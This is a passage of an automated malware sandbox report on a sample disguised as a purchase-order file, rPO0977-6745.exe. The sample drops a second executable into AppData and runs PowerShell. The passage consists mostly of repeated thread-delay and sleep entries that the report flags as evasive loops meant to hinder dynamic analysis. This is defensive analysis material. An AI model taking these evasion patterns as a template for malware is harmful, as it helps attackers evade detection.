Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596094 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595969 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595859 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595750 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595640 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595531 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595422 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595312 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595203 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595094 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 594984 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 594875 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 594765 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 594656 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 594547 Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599220
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598766
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597984
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597875
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597765
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597328
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597216
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596660
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596516
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596357
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596241
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596140
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 596029
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595921
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595812
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595703
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595594
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595484
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595375
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 595046
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 594714
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 594607
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 594500
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7745 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 938 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8062 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 869 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Window / User API: threadDelayed 2969 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Window / User API: threadDelayed 6883 Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Window / User API: threadDelayed 3230
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Window / User API: threadDelayed 6619
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 6440 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -33204139332677172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -599872s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7420 Thread sleep count: 2969 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -599654s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7420 Thread sleep count: 6883 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -599422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -599312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -599202s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -599093s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -598983s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -598875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -598758s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -598656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -598542s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -598436s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -598328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -598218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -598091s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -597983s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -597875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -597765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -597653s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -597547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -597437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -597328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -597219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -597109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -597000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -596890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -596781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -596672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -596562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -596453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -596344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -596204s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -596094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -595969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -595859s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -595750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -595640s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -595531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -595422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -595312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -595203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -595094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -594984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -594875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -594765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -594656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388 Thread sleep time: -594547s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 7296 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8096 Thread sleep count: 3230 > 30
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8096 Thread sleep count: 6619 > 30
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -599344s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -599220s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -598982s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -598766s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -598547s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -598437s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -598328s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -598219s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -598094s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -597984s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -597875s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -597765s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -597656s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -597547s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -597437s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -597328s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -597216s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -597109s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -597000s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -596890s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -596781s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -596660s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -596516s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -596357s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -596241s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -596140s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -596029s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -595921s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -595812s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -595703s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -595594s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -595484s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -595375s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -595265s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -595156s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -595046s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -594937s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -594714s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -594607s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092 Thread sleep time: -594500s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599872 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599654 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599202 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598983 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598875 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598758 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598656 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598542 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598436 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598091 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597983 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597765 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597653 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597547 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597328 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597219 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597109 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597000 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596672 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596453 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596344 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596204 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596094 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595969 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595859 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595750 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595640 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595531 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595422 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595312 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595203 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 595094 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 594984 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 594875 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 594765 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 594656 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 594547 Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599220
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598766
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597984
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597875
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597765
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Thread delayed: delay time: 597328
